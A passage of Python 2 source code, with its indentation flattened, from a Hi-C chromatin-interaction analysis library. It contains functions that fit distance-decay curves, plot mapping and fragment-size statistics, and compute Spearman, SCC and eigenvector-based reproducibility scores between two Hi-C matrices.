:returns: slope, intercept and R square of each of the 3 correlations
"""
if isinstance(data, basestring):
resolution = resolution or 1
dist_intr = dict([(i, {})
for i in xrange(min_diff, max_diff)])
fhandler = open(data)
line = fhandler.next()
while line.startswith('#'):
line = fhandler.next()
try:
while True:
_, cr1, ps1, _, _, _, _, cr2, ps2, _ = line.split('\t', 9)
if cr1 != cr2:
line = fhandler.next()
continue
diff = abs(int(ps1) / resolution - int(ps2) / resolution)
if max_diff > diff >= min_diff:
try:
dist_intr[diff][int(ps1) / resolution] += 1.
except KeyError:
dist_intr[diff][int(ps1) / resolution] = 1.
line = fhandler.next()
except StopIteration:
pass
fhandler.close()
for diff in dist_intr:
dist_intr[diff] = [dist_intr[diff].get(k, 0)
for k in xrange(max(dist_intr[diff]) - diff)]
elif isinstance(data, HiC_data):
resolution = resolution or data.resolution
dist_intr = dict([(i, []) for i in xrange(min_diff, max_diff)])
if normalized:
get_data = lambda x, y: data[x, y] / data.bias[x] / data.bias[y]
else:
get_data = lambda x, y: data[x, y]
max_diff = min(len(data), max_diff)
if data.section_pos:
for crm in data.section_pos:
for diff in xrange(min_diff, min(
(max_diff, 1 + data.chromosomes[crm]))):
for i in xrange(data.section_pos[crm][0],
data.section_pos[crm][1] - diff):
dist_intr[diff].append(get_data(i, i + diff))
else:
for diff in xrange(min_diff, max_diff):
for i in xrange(len(data) - diff):
if not np.isnan(data[i, i + diff]):
dist_intr[diff].append(get_data(i, diff))
elif isinstance(data, dict): # if we pass decay/expected dictionary, computes weighted mean
dist_intr = {}
for i in range(min_diff, max_diff):
val = [data[c][i] for c in data
if i in data[c] and data[c][i] != data[c].get(i-1, 0)]
if val:
dist_intr[i] = [sum(val) / float(len(val))]
else:
dist_intr[i] = [0]
else:
dist_intr = dict([(i, []) for i in xrange(min_diff, max_diff)])
if genome_seq:
max_diff = min(max(genome_seq.values()), max_diff)
cnt = 0
for crm in genome_seq:
for diff in xrange(min_diff, min(
(max_diff, genome_seq[crm]))):
for i in xrange(cnt, cnt + genome_seq[crm] - diff):
if not np.isnan(data[i][i + diff]):
dist_intr[diff].append(data[i][i + diff])
cnt += genome_seq[crm]
else:
max_diff = min(len(data), max_diff)
for diff in xrange(min_diff, max_diff):
for i in xrange(len(data) - diff):
if not np.isnan(data[i][i + diff]):
dist_intr[diff].append(data[i][i + diff])
resolution = resolution or 1
if not axe:
fig=plt.figure()
axe = fig.add_subplot(111)
# remove last part of the plot in case no interaction is count... reduce max_dist
for diff in xrange(max_diff - 1, min_diff, -1):
try:
if not dist_intr[diff]:
del(dist_intr[diff])
max_diff -=1
continue
except KeyError:
max_diff -=1
continue
break
# get_cmap the mean values perc bins
mean_intr = dict([(i, float(sum(dist_intr[i])) / len(dist_intr[i]))
for i in dist_intr if len(dist_intr[i])])
if plot_each_cell:
xp, yp = [], []
for x, y in sorted(dist_intr.items(), key=lambda x:x[0]):
xp.extend([x] * len(y))
yp.extend(y)
x = []
y = []
for k in xrange(len(xp)):
if yp[k]:
x.append(xp[k])
y.append(yp[k])
axe.plot(x, y, color='grey', marker='.', alpha=0.1, ms=1,
linestyle='None')
xp, yp = zip(*sorted(mean_intr.items(), key=lambda x:x[0]))
x = []
y = []
for k in xrange(len(xp)):
if yp[k]:
x.append(xp[k])
y.append(yp[k])
axe.plot(x, y, 'k.', alpha=0.4)
best = (float('-inf'), 0, 0, 0, 0, 0, 0, 0, 0, 0)
logx = np.log(x)
logy = np.log(y)
ntries = 100
# set k for better fit
# for k in xrange(1, ntries/5, ntries/5/5):
if resolution == 1:
k = 1
for i in xrange(3, ntries-2-k):
v1 = i * len(x) / ntries
try:
a1, b1, r21, _, _ = linregress(logx[ :v1], logy[ :v1])
except ValueError:
a1 = b1 = r21 = 0
r21 *= r21
for j in xrange(i + 1 + k, ntries - 2 - k):
v2 = j * len(x) / ntries
try:
a2, b2, r22, _, _ = linregress(logx[v1+k:v2], logy[v1+k:v2])
a3, b3, r23, _, _ = linregress(logx[v2+k: ], logy[v2+k: ])
except ValueError:
a2 = b2 = r22 = 0
a3 = b3 = r23 = 0
r2 = r21 + r22**2 + r23**2
if r2 > best[0]:
best = (r2, v1, v2, a1, a2, a3,
b1, b2, b3, k)
# plot line of best fit
(v1, v2,
a1, a2, a3,
b1, b2, b3, k) = best[1:]
yfit1 = lambda xx: np.exp(b1 + a1*np.array (np.log(xx)))
yfit2 = lambda xx: np.exp(b2 + a2*np.array (np.log(xx)))
yfit3 = lambda xx: np.exp(b3 + a3*np.array (np.log(xx)))
axe.plot(x[ :v1], yfit1(x[ :v1] ), color= 'yellow', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0-0.7 \mathrm{ Mb}' if resolution != 1 else '1', a1))
#label = r'$\alpha_1=%.2f$ (0-%d)' % (a1, x[v1]))
axe.plot(x[v1+k:v2], yfit2(x[v1+k:v2]), color= 'orange', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0.7-10 \mathrm{ Mb}' if resolution != 1 else '2', a2))
# label = r'$\alpha_2=%.2f$ (%d-%d)' % (a2, x[v1], x[v2]))
axe.plot(x[v2+k: ], yfit3(x[v2+k: ] ), color= 'red' , lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'10 \mathrm{ Mb}-\infty' if resolution != 1 else '3', a3))
# label = r'$\alpha_3=%.2f$ (%d-$\infty$)' % (a3, x[v2+k]))
else:
# from 0.7 Mb
v1 = 700000 / resolution
# to 10 Mb
v2 = 10000000 / resolution
try:
a1, b1, r21, _, _ = linregress(logx[ :v1], logy[ :v1])
except ValueError:
a1, b1, r21 = 0, 0, 0
try:
a2, b2, r22, _, _ = linregress(logx[v1:v2], logy[v1:v2])
except ValueError:
a2, b2, r22 = 0, 0, 0
try:
a3, b3, r23, _, _ = linregress(logx[v2: ], logy[v2: ])
except ValueError:
a3, b3, r23 = 0, 0, 0
yfit1 = lambda xx: np.exp(b1 + a1*np.array (np.log(xx)))
yfit2 = lambda xx: np.exp(b2 + a2*np.array (np.log(xx)))
yfit3 = lambda xx: np.exp(b3 + a3*np.array (np.log(xx)))
axe.plot(x[ :v1], yfit1(x[ :v1] ), color= 'yellow', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0-0.7 \mathrm{ Mb}' if resolution != 1 else '1', a1))
#label = r'$\alpha_1=%.2f$ (0-%d)' % (a1, x[v1]))
axe.plot(x[v1:v2], yfit2(x[v1:v2]), color= 'orange', lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'0.7-10 \mathrm{ Mb}' if resolution != 1 else '2', a2))
# label = r'$\alpha_2=%.2f$ (%d-%d)' % (a2, x[v1], x[v2]))
axe.plot(x[v2: ], yfit3(x[v2: ] ), color= 'red' , lw=2,
label = r'$\alpha_{%s}=%.2f$' % (
'10 \mathrm{ Mb}-\infty' if resolution != 1 else '3', a3))
# label = r'$\alpha_3=%.2f$ (%d-$\infty$)' % (a3, x[v2+k]))
axe.set_ylabel('Log interaction count')
axe.set_xlabel('Log genomic distance (resolution: %s)' % nicer(resolution))
axe.legend(loc='lower left', frameon=False)
axe.set_xscale('log')
axe.set_yscale('log')
axe.set_xlim((min_diff, max_diff))
try:
axe.set_ylim((0, max(y)))
except ValueError:
pass
if savefig:
tadbit_savefig(savefig)
plt.close('all')
elif show:
plt.show()
plt.close('all')
return (a1, b1, r21), (a2, b2, r22), (a3, b3, r23)
def plot_iterative_mapping(fnam1, fnam2, total_reads=None, axe=None, savefig=None):
"""
Plots the number of reads mapped at each step of the mapping process (in the
case of the iterative mapping, each step is mapping process with a given
size of fragments).
:param fnam: input file name
:param total_reads: total number of reads in the initial FASTQ file
:param None axe: a matplotlib.axes.Axes object to define the plot
appearance
:param None savefig: path to a file where to save the image generated;
if None, the image will be shown using matplotlib GUI (the extension
of the file name will determine the desired format).
:returns: a dictionary with the number of reads per mapped length
"""
count_by_len = {}
total_reads = total_reads or 1
if not axe:
fig=plt.figure()
_ = fig.add_subplot(111)
colors = ['olive', 'darkcyan']
iteration = False
for i, fnam in enumerate([fnam1, fnam2]):
fhandler = open(fnam)
line = fhandler.next()
count_by_len[i] = {}
while line.startswith('#'):
if line.startswith('# MAPPED '):
itr, num = line.split()[2:]
count_by_len[i][int(itr)] = int(num)
line = fhandler.next()
if not count_by_len[i]:
iteration = True
try:
while True:
_, length, _, _ = line.rsplit('\t', 3)
try:
count_by_len[i][int(length)] += 1
except KeyError:
count_by_len[i][int(length)] = 1
line = fhandler.next()
except StopIteration:
pass
fhandler.close()
lengths = sorted(count_by_len[i].keys())
for k in lengths[::-1]:
count_by_len[i][k] += sum([count_by_len[i][j]
for j in lengths if j < k])
plt.plot(lengths, [float(count_by_len[i][l]) / total_reads
for l in lengths],
label='read' + str(i + 1), linewidth=2, color=colors[i])
if iteration:
plt.xlabel('read length (bp)')
else:
plt.xlabel('Iteration number')
if total_reads != 1:
plt.ylabel('Proportion of mapped reads')
else:
plt.ylabel('Number of mapped reads')
plt.legend(loc=4)
if savefig:
tadbit_savefig(savefig)
elif not axe:
plt.show()
plt.close('all')
return count_by_len
def fragment_size(fnam, savefig=None, nreads=None, max_size=99.9, axe=None,
show=False, xlog=False, stats=('median', 'perc_max'),
too_large=10000):
"""
Plots the distribution of dangling-ends lengths
:param fnam: input file name
:param None savefig: path where to store the output images.
:param 99.9 max_size: top percentage of distances to consider, within the
top 0.01% are usually found very long outliers.
:param False xlog: represent x axis in logarithmic scale
:param ('median', 'perc_max') stats: returns this set of values calculated from the
distribution of insert/fragment sizes. Possible values are:
- 'median' median of the distribution
- 'mean' mean of the distribution
- 'perc_max' percentil defined by the other parameter 'max_size'
- 'first_deacay' starting from the median of the distribution to the
first window where 10 consecutive insert sizes are counted less than
a given value (this given value is equal to the sum of all
sizes divided by 100 000)
- 'MAD' Double Median Adjusted Deviation
:param 10000 too_large: upper bound limit for fragment size to consider
:param None nreads: number of reads to process (default: all reads)
:returns: the median value and the percentile inputed as max_size.
"""
distr = {}
genome_seq = OrderedDict()
pos = 0
fhandler = open(fnam)
for line in fhandler:
if line.startswith('#'):
if line.startswith('# CRM '):
crm, clen = line[6:].split('\t')
genome_seq[crm] = int(clen)
else:
break
pos += len(line)
fhandler.seek(pos)
des = []
for line in fhandler:
(crm1, pos1, dir1, _, re1, _,
crm2, pos2, dir2, _, re2) = line.strip().split('\t')[1:12]
if re1 == re2 and crm1 == crm2 and dir1 == '1' and dir2 == '0':
pos1, pos2 = int(pos1), int(pos2)
des.append(pos2 - pos1)
if len(des) == nreads:
break
des = [i for i in des if i <= too_large]
fhandler.close()
if not des:
raise Exception('ERROR: no dangling-ends found in %s' % (fnam))
max_perc = np.percentile(des, max_size)
perc99 = np.percentile(des, 99)
perc01 = np.percentile(des, 1)
perc50 = np.percentile(des, 50)
meanfr = np.mean(des)
perc95 = np.percentile(des, 95)
perc05 = np.percentile(des, 5)
to_return = {'median': perc50}
cutoff = len(des) / 100000.
count = 0
for v in xrange(int(perc50), int(max(des))):
if des.count(v) < cutoff:
count += 1
else:
count = 0
if count >= 10:
to_return['first_decay'] = v - 10
break
else:
raise Exception('ERROR: not found')
to_return['perc_max'] = max_perc
to_return['MAD'] = mad(des)
to_return['mean'] = meanfr
if not savefig and not axe and not show:
return [to_return[k] for k in stats]
ax = setup_plot(axe, figsize=(10, 5.5))
desapan = ax.axvspan(perc95, perc99, facecolor='black', alpha=.2,
label='1-99%% DEs\n(%.0f-%.0f nts)' % (perc01, perc99))
ax.axvspan(perc01, perc05, facecolor='black', alpha=.2)
desapan = ax.axvspan(perc05, perc95, facecolor='black', alpha=.4,
label='5-95%% DEs\n(%.0f-%.0f nts)' % (perc05, perc95))
deshist = ax.hist(des, bins=100, range=(0, max_perc), lw=2,
alpha=.5, edgecolor='darkred', facecolor='darkred', label='Dangling-ends')
ylims = ax.get_ylim()
plots = []
ax.set_xlabel('Genomic distance between reads')
ax.set_ylabel('Count')
ax.set_title('Distribution of dangling-ends ' +
'lenghts\nmedian: %s (mean: %s), top %.1f%%: %0.f nts' % (
int(perc50), int(meanfr), max_size, int(max_perc)))
if xlog:
ax.set_xscale('log')
ax.set_xlim((50, max_perc))
plt.subplots_adjust(left=0.1, right=0.75)
ax.legend(bbox_to_anchor=(1.4, 1), frameon=False)
if savefig:
tadbit_savefig(savefig)
elif show and not axe:
plt.show()
plt.close('all')
return [to_return[k] for k in stats]
def plot_genomic_distribution(fnam, first_read=None, resolution=10000,
ylim=None, yscale=None, savefig=None, show=False,
savedata=None, chr_names=None, nreads=None):
"""
Plot the number of reads in bins along the genome (or along a given
chromosome).
:param fnam: input file name
:param True first_read: uses first read.
:param 100 resolution: group reads that are closer than this resolution
parameter
:param None ylim: a tuple of lower and upper bound for the y axis
:param None yscale: if set_bad to "log" values will be represented in log2
scale
:param None savefig: path to a file where to save the image generated;
if None, the image will be shown using matplotlib GUI (the extension
of the file name will determine the desired format).
:param None savedata: path where to store the output read counts per bin.
:param None chr_names: can pass a list of chromosome names in case only some
them the need to be plotted (this option may last even more than default)
:param None nreads: number of reads to process (default: all reads)
"""
if first_read:
warn('WARNING: first_read parameter should no loonger be used.')
distr = {}
genome_seq = OrderedDict()
if chr_names:
chr_names = set(chr_names)
cond1 = lambda x: x not in chr_names
else:
cond1 = lambda x: False
if nreads:
cond2 = lambda x: x >= nreads
else:
cond2 = lambda x: False
cond = lambda x, y: cond1(x) or cond2(y)
count = 0
pos = 0
fhandler = open(fnam)
for line in fhandler:
if line.startswith('#'):
if line.startswith('# CRM '):
crm, clen = line[6:].split('\t')
genome_seq[crm] = int(clen)
else:
break
pos += len(line)
fhandler.seek(pos)
for line in fhandler:
line = line.strip().split('\t')
count += 1
for idx1, idx2 in ((1, 3), (7, 9)):
crm, pos = line[idx1:idx2]
if cond(crm, count):
if cond2(count):
break
continue
pos = int(pos) / resolution
try:
distr[crm][pos] += 1
except KeyError:
try:
distr[crm][pos] = 1
except KeyError:
distr[crm] = {pos: 1}
else:
continue
break
fhandler.close()
if savefig or show:
_ = plt.figure(figsize=(15, 1 + 3 * len(
chr_names if chr_names else distr.keys())))
max_y = max([max(distr[c].values()) for c in distr])
max_x = max([len(distr[c].values()) for c in distr])
ncrms = len(chr_names if chr_names else genome_seq if genome_seq else distr)
data = {}
for i, crm in enumerate(chr_names if chr_names else genome_seq
if genome_seq else distr):
try:
# data[crm] = [distr[crm].get(j, 0) for j in xrange(max(distr[crm]))] # genome_seq[crm]
data[crm] = [distr[crm].get(j, 0)
for j in xrange(genome_seq[crm] / resolution + 1)]
if savefig or show:
plt.subplot(ncrms, 1, i + 1)
plt.plot(range(genome_seq[crm] / resolution + 1), data[crm],
color='red', lw=1.5, alpha=0.7)
if yscale:
plt.yscale(yscale)
except KeyError:
pass
if savefig or show:
if ylim:
plt.vlines(genome_seq[crm] / resolution, ylim[0], ylim[1])
else:
plt.vlines(genome_seq[crm] / resolution, 0, max_y)
plt.xlim((0, max_x))
plt.ylim(ylim or (0, max_y))
plt.title(crm)
if savefig:
tadbit_savefig(savefig)
if not show:
plt.close('all')
elif show:
plt.show()
if savedata:
out = open(savedata, 'w')
out.write('# CRM\tstart-end\tcount\n')
out.write('\n'.join('%s\t%d-%d\t%d' % (c, (i * resolution) + 1,
((i + 1) * resolution), v)
for c in data for i, v in enumerate(data[c])))
out.write('\n')
out.close()
def _unitize(vals):
return np.argsort(vals) / float(len(vals))
def correlate_matrices(hic_data1, hic_data2, max_dist=10, intra=False, axe=None,
savefig=None, show=False, savedata=None, min_dist=1,
normalized=False, remove_bad_columns=True, **kwargs):
"""
Compare the interactions of two Hi-C matrices at a given distance,
with Spearman rank correlation.
Also computes the SCC reproducibility score as in HiCrep (see
https://doi.org/10.1101/gr.220640.117). It's implementation is inspired
by the version implemented in dryhic by Enrique Vidal
(https://github.com/qenvio/dryhic).
:param hic_data1: Hi-C-data object
:param hic_data2: Hi-C-data object
:param 1 resolution: to be used for scaling the plot
:param 10 max_dist: maximum distance from diagonal (e.g. 10 mean we will
not look further than 10 times the resolution)
:param 1 min_dist: minimum distance from diagonal (set to 0 to reproduce
result from HicRep)
:param None savefig: path to save the plot
:param False intra: only takes into account intra-chromosomal contacts
:param False show: displays the plot
:param False normalized: use normalized data
:param True remove_bads: computes the union of bad columns between samples
and exclude them from the comparison
:returns: list of correlations, list of genomic distances, SCC and standard
deviation of SCC
"""
spearmans = []
pearsons = []
dists = []
weigs = []
if normalized:
get_the_guy1 = lambda i, j: (hic_data1[j, i] / hic_data1.bias[i] /
hic_data1.bias[j])
get_the_guy2 = lambda i, j: (hic_data2[j, i] / hic_data2.bias[i] /
hic_data2.bias[j])
else:
get_the_guy1 = lambda i, j: hic_data1[j, i]
get_the_guy2 = lambda i, j: hic_data2[j, i]
if remove_bad_columns:
# union of bad columns
bads = hic_data1.bads.copy()
bads.update(hic_data2.bads)
if (intra and hic_data1.sections and hic_data2.sections and
hic_data1.sections == hic_data2.sections):
for dist in xrange(1, max_dist + 1):
diag1 = []
diag2 = []
for crm in hic_data1.section_pos:
for j in xrange(hic_data1.section_pos[crm][0],
hic_data1.section_pos[crm][1] - dist):
i = j + dist
if j in bads or i in bads:
continue
diag1.append(get_the_guy1(i, j))
diag2.append(get_the_guy2(i, j))
spearmans.append(spearmanr(diag1, diag2)[0])
pearsons.append(spearmanr(diag1, diag2)[0])
r1 = _unitize(diag1)
r2 = _unitize(diag2)
weigs.append((np.var(r1, ddof=1) *
np.var(r2, ddof=1))**0.5 * len(diag1))
dists.append(dist)
else:
if intra:
warn('WARNING: hic_dta does not contain chromosome coordinates, ' +
'intra set to False')
for dist in xrange(min_dist, max_dist + min_dist):
diag1 = []
diag2 = []
for j in xrange(len(hic_data1) - dist):
i = j + dist
if j in bads or i in bads:
continue
diag1.append(get_the_guy1(i, j))
diag2.append(get_the_guy2(i, j))
spearmans.append(spearmanr(diag1, diag2)[0])
pearsons.append(pearsonr(diag1, diag2)[0])
r1 = _unitize(diag1)
r2 = _unitize(diag2)
weigs.append((np.var(r1, ddof=1) *
np.var(r2, ddof=1))**0.5 * len(diag1))
dists.append(dist)
# compute scc
# print pearsons
# print weigs
tot_weigth = sum(weigs)
scc = sum(pearsons[i] * weigs[i] / tot_weigth
for i in xrange(len(pearsons)))
var_corr = np.var(pearsons, ddof=1)
std = (sum(weigs[i]**2 for i in xrange(len(pearsons))) * var_corr /
sum(weigs)**2)**0.5
# plot
if show or savefig or axe:
if not axe:
fig = plt.figure()
axe = fig.add_subplot(111)
given_axe = False
else:
given_axe = True
axe.plot(dists, spearmans, color='orange', linewidth=3, alpha=.8)
axe.set_xlabel('Genomic distance in bins')
axe.set_ylabel('Spearman rank correlation')
axe.set_xlim((0, dists[-1]))
if savefig:
tadbit_savefig(savefig)
if show:
plt.show()
if not given_axe:
plt.close('all')
if savedata:
out = open(savedata, 'w')
out.write('# genomic distance\tSpearman rank correlation\n')
for i in xrange(len(spearmans)):
out.write('%s\t%s\n' % (dists[i], spearmans[i]))
out.close()
if kwargs.get('get_bads', False):
return spearmans, dists, scc, std, bads
return spearmans, dists, scc, std
def _evec_dist(v1,v2):
d1=np.dot(v1-v2,v1-v2)
d2=np.dot(v1+v2,v1+v2)
if d1<d2:
d=d1
else:
d=d2
return np.sqrt(d)
def _get_Laplacian(M):
S=M.sum(1)
i_nz=np.where(S>0)[0]
S=S[i_nz]
M=(M[i_nz].T)[i_nz].T
S=1/np.sqrt(S)
M=S*M
M=(S*M.T).T
n=np.size(S)
M=np.identity(n)-M
M=(M+M.T)/2
return M
def get_ipr(evec):
ipr=1.0/(evec*evec*evec*evec).sum()
return ipr
def get_reproducibility(hic_data1, hic_data2, num_evec, verbose=True,
normalized=False, remove_bad_columns=True):
"""
Compute reproducibility score similarly to HiC-spector
(https://doi.org/10.1093/bioinformatics/btx152)
:param hic_data1: Hi-C-data object
:param hic_data2: Hi-C-data object
:param 20 num_evec: number of eigenvectors to compare
:returns: reproducibility score (bellow 0.5 ~ different cell types)
"""
M1 = hic_data1.get_matrix(normalized=normalized)
M2 = hic_data2.get_matrix(normalized=normalized)
if remove_bad_columns:
# union of bad columns
bads = hic_data1.bads.copy()
bads.update(hic_data2.bads)
# remove them form both matrices
for bad in sorted(bads, reverse=True):
del(M1[bad])
del(M2[bad])
for i in xrange(len(M1)):
_ = M1[i].pop(bad)
_ = M2[i].pop(bad)
M1 = np.matrix(M1)
M2 = np.matrix(M2)
k1=np.sign(M1.A).sum(1)
d1=np.diag(M1.A)
kd1=~((k1==1)*(d1>0))
k2=np.sign(M2.A).sum(1)
d2=np.diag(M2.A)
kd2=~((k2==1)*(d2>0))
iz=np.nonzero((k1+k2>0)*(kd1>0)*(kd2>0))[0]
M1b=(M1[iz].A.T)[iz].T
M2b=(M2[iz].A.T)[iz].T
i_nz1=np.where(M1b.sum(1)>0)[0]
i_nz2=np.where(M2b.sum(1)>0)[0]
i_z1=np.where(M1b.sum(1)==0)[0]
i_z2=np.where(M2b.sum(1)==0)[0]
M1b_L=_get_Laplacian(M1b)
M2b_L=_get_Laplacian(M2b)
a1, b1=eigsh(M1b_L,k=num_evec,which="SM")
a2, b2=eigsh(M2b_L,k=num_evec,which="SM")
b1_extend=np.zeros((np.size(M1b,0),num_evec))
b2_extend=np.zeros((np.size(M2b,0),num_evec))
for i in range(num_evec):
b1_extend[i_nz1,i]=b1[:,i]
b2_extend[i_nz2,i]=b2[:,i]
ipr_cut=5
ipr1=np.zeros(num_evec)
ipr2=np.zeros(num_evec)
for i in range(num_evec):
ipr1[i]=get_ipr(b1_extend[:,i])
ipr2[i]=get_ipr(b2_extend[:,i])
b1_extend_eff=b1_extend[:,ipr1>ipr_cut]
b2_extend_eff=b2_extend[:,ipr2>ipr_cut]
num_evec_eff=min(np.size(b1_extend_eff,1),np.size(b2_extend_eff,1))
evd=np.zeros(num_evec_eff)
for i in range(num_evec_eff):
evd[i]=_evec_dist(b1_extend_eff[:,i],b2_extend_eff[:,i])
Sd=evd.sum()
l=np.sqrt(2)
evs=abs(l-Sd/num_evec_eff)/l
N = float(M1.shape[1])
if verbose:
if (np.sum(ipr1>N/100)<=1)|(np.sum(ipr2>N/100)<=1):
print("at least one of the maps does not look like typical Hi-C maps")
else:
print("size of maps: %d" %(np.size(M1,0)))
print("reproducibility score: %6.3f " %(evs))
print("num_evec_eff: %d" %(num_evec_eff))
return evs
def eig_correlate_matrices(hic_data1, hic_data2, nvect=6, normalized=False,
savefig=None, show=False, savedata=None,
remove_bad_columns=True, **kwargs):
"""
Compare the interactions of two Hi-C matrices using their 6 first
eigenvectors, with Pearson correlation
:param hic_data1: Hi-C-data object
:param hic_data2: Hi-C-data object
:param 6 nvect: number of eigenvectors to compare
:param None savefig: path to save the plot
:param False show: displays the plot
:param False normalized: use normalized data
:param True remove_bads: computes the union of bad columns between samples
and exclude them from the comparison
:param kwargs: any argument to pass to matplotlib imshow function
:returns: matrix of correlations
"""
data1 = hic_data1.get_matrix(normalized=normalized)
data2 = hic_data2.get_matrix(normalized=normalized)
## reduce matrices to remove bad columns
if remove_bad_columns:
# union of bad columns
bads = hic_data1.bads.copy()
bads.update(hic_data2.bads)
# remove them form both matrices
for bad in sorted(bads, reverse=True):
del(data1[bad])
del(data2[bad])
for i in xrange(len(data1)):
_ = data1[i].pop(bad)
_ = data2[i].pop(bad)
# get the log
data1 = nozero_log(data1, np.log2)
data2 = nozero_log(data2, np.log2)
# get the eigenvectors
ev1, evect1 = eigh(data1)
ev2, evect2 = eigh(data2)
corr = [[0 for _ in xrange(nvect)] for _ in xrange(nvect)]
# sort eigenvectors according to their eigenvalues => first is last!!
sort_perm = ev1.argsort()
ev1.sort()
evect1 = evect1[sort_perm]
sort_perm = ev2.argsort()
ev2.sort()
evect2 = evect2[sort_perm]
# calculate Pearson correlation
for i in xrange(nvect):
for j in xrange(nvect):
corr[i][j] = abs(pearsonr(evect1[:,-i-1],
evect2[:,-j-1])[0])
# plot
axe = plt.axes([0.1, 0.1, 0.6, 0.8])
cbaxes = plt.axes([0.85, 0.1, 0.03, 0.8])
if show or savefig:
im = axe.imshow(corr, interpolation="nearest",origin='lower', **kwargs)
axe.set_xlabel('Eigen Vectors exp. 1')
axe.set_ylabel('Eigen Vectors exp. 2')
axe.set_xticks(range(nvect))
axe.set_yticks(range(nvect))
axe.set_xticklabels(range(1, nvect + 2))
axe.set_yticklabels(range(1, nvect + 2))
axe.xaxis.set_tick_params(length=0, width=0)
axe.yaxis.set_tick_params(length=0, width=0)
cbar = plt.colorbar(im, cax = cbaxes )
cbar.ax.set_ylabel('Pearson correlation', rotation=90*3,
verticalalignment='bottom')
axe2 = axe.twinx()
axe2.set_yticks(range(nvect))
axe2.set_yticklabels(['%.1f' % (e) for e in ev2[-nvect:][::-1]])
axe2.set_ylabel('corresponding Eigen Values exp. 2', rotation=90*3,
verticalalignment='bottom')
axe2.set_ylim((-0.5, nvect - 0.5))
axe2.yaxis.set_tick_params(length=0, width=0)
axe3 = axe.twiny()
axe3.set_xticks(range(nvect))
axe3.set_xticklabels(['%.1f' % (e) for e in ev1[-nvect:][::-1]])
axe3.set_xlabel('corresponding Eigen Values exp. 1')
axe3.set_xlim((-0.5, nvect - 0.5))
axe3.xaxis.set_tick_params(length=0, width=0)
axe.set_ylim((-0.5, nvect - 0.5))
axe.set_xlim((-0.5, nvect - 0.5))
if savefig:
tadbit_savefig(savefig)
if show:
plt.show()
plt.close('all')
if savedata:
out = open(savedata, 'w')
out.write('# ' + '\t'.join(['Eigen Vector %s'% i
for i in xrange(nvect)]) + '\n')
for i in xrange(nvect):
out.write('\t'.join([str(corr[i][j])
for j in xrange(nvect)]) + '\n')
out.close()
if kwargs.get('get_bads', False):
return corr, bads
else:
return corr
def plot_rsite_reads_distribution(reads_file, outprefix, window=20,
maxdist=1000):
de_right={}
de_left={}
print "process reads"
fl=open(reads_file)
while True:
line=fl.next()
if not line.startswith('#'):
break
nreads=0
try:
while True:
nreads += 1
if nreads % 1000000 == 0:
print nreads
try:
_, n1, sb1, sd1, l1, ru1, rd1, n2, sb2, sd2, l2, ru2, rd2\
= line.split()
sb1, sd1, l1, ru1, rd1, sb2, sd2, l2, ru2, rd2 = \
map(int, [sb1, sd1, l1, ru1, rd1, sb2, sd2, l2,
ru2, rd2])
except ValueError:
print line
raise ValueError("line is not the right format!")
if n1 != n2:
line=fl.next()
continue
#read1 ahead of read2
if sb1 > sb2:
sb1, sd1, l1, ru1, rd1, sb2, sd2, l2, ru2, rd2 = \
sb2, sd2, l2, ru2, rd2, sb1, sd1, l1, ru1, rd1
#direction always -> <-
if not (sd1 == 1 and sd2 == 0):
line=fl.next()
continue
#close to the diagonal
if sb2-sb1 > maxdist:
line=fl.next()
continue
#close to RE 1
if abs(sb1-ru1) < abs(sb1-rd1):
rc1=ru1
else:
rc1=rd1
pos=sb1-rc1
if abs(pos)<=window:
if not pos in de_right:
de_right[pos]=0
de_right[pos]+=1
#close to RE 2
if abs(sb2-ru2) < abs(sb2-rd2):
rc2=ru2
else:
rc2=rd2
pos=sb2-rc2
if abs(pos)<=window:
if not pos in de_left:
de_left[pos]=0
de_left[pos]+=1
line=fl.next()
except StopIteration:
pass
print " finished processing {} reads".format(nreads)
#transform to arrays
ind = range(-window,window+1)
de_r = map(lambda x:de_right.get(x,0), ind)
de_l = map(lambda x:de_left.get(x,0), ind)
#write to files
print "write to files"
fl=open(outprefix+'_count.dat','w')
fl.write('#dist\tX~~\t~~X\n')
for i,j,k in zip(ind,de_r, de_l):
fl.write('{}\t{}\t{}\n'.format(i, j, k))
#write plot
rcParams.update({'font.size': 10})
pp = PdfPages(outprefix+'_plot.pdf')
ind = np.array(ind)
width = 1
pr = plt.bar(ind-0.5, de_r, width, color='r')
pl = plt.bar(ind-0.5, de_l, width, bottom=de_r, color='b')
plt.ylabel("Count")
plt.title("Histogram of counts around cut site")
plt.xticks(ind[::2], rotation="vertical")
plt.legend((pl[0], pr[0]), ("~~X", "X~~"))
plt.gca().set_xlim([-window-1,window+1])
pp.savefig()
pp.close()
def moving_average(a, n=3):
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
def plot_diagonal_distributions(reads_file, outprefix, ma_window=20,
maxdist=800, de_left=[-2,3], de_right=[0,5]):
rbreaks={}
rejoined={}
des={}
print "process reads"
fl=open(reads_file)
while True:
line=fl.next()
if not line.startswith('#'):
break
nreads=0
try:
while True:
nreads += 1
if nreads % 1000000 == 0:
print nreads
try:
_, n1, sb1, sd1, _, ru1, rd1, n2, sb2, sd2, _, ru2, rd2\
= line.split()
sb1, sd1, ru1, rd1, sb2, sd2, ru2, rd2 = \
map(int, [sb1, sd1, ru1, rd1, sb2, sd2, ru2, rd2])
except ValueError:
print line
raise ValueError("line is not the right format!")
if n1 != n2:
line=fl.next()
continue
#read1 ahead of read2
if sb1 > sb2:
sb1, sd1, ru1, rd1, sb2, sd2, ru2, rd2 = \
sb2, sd2, ru2, rd2, sb1, sd1, ru1, rd1
#direction always -> <-
if not (sd1 == 1 and sd2 == 0):
line=fl.next()
continue
mollen = sb2-sb1
if mollen > maxdist:
line=fl.next()
continue
#DE1
if abs(sb1-ru1) < abs(sb1-rd1):
rc1=ru1
else:
rc1=rd1
pos=sb1-rc1
if pos in de_right:
if not mollen in des:
des[mollen]=0
des[mollen]+=1
line=fl.next()
continue
#DE2
if abs(sb2-ru2) < abs(sb2-rd2):
rc2=ru2
else:
rc2=rd2
pos=sb2-rc2
if pos in de_left:
if not mollen in des:
des[mollen]=0
des[mollen]+=1
line=fl.next()
continue
#random: map on same fragment
if rd1 == rd2:
if not mollen in rbreaks:
rbreaks[mollen]=0
rbreaks[mollen]+=1
line=fl.next()
continue
#rejoined ends
if not mollen in rejoined:
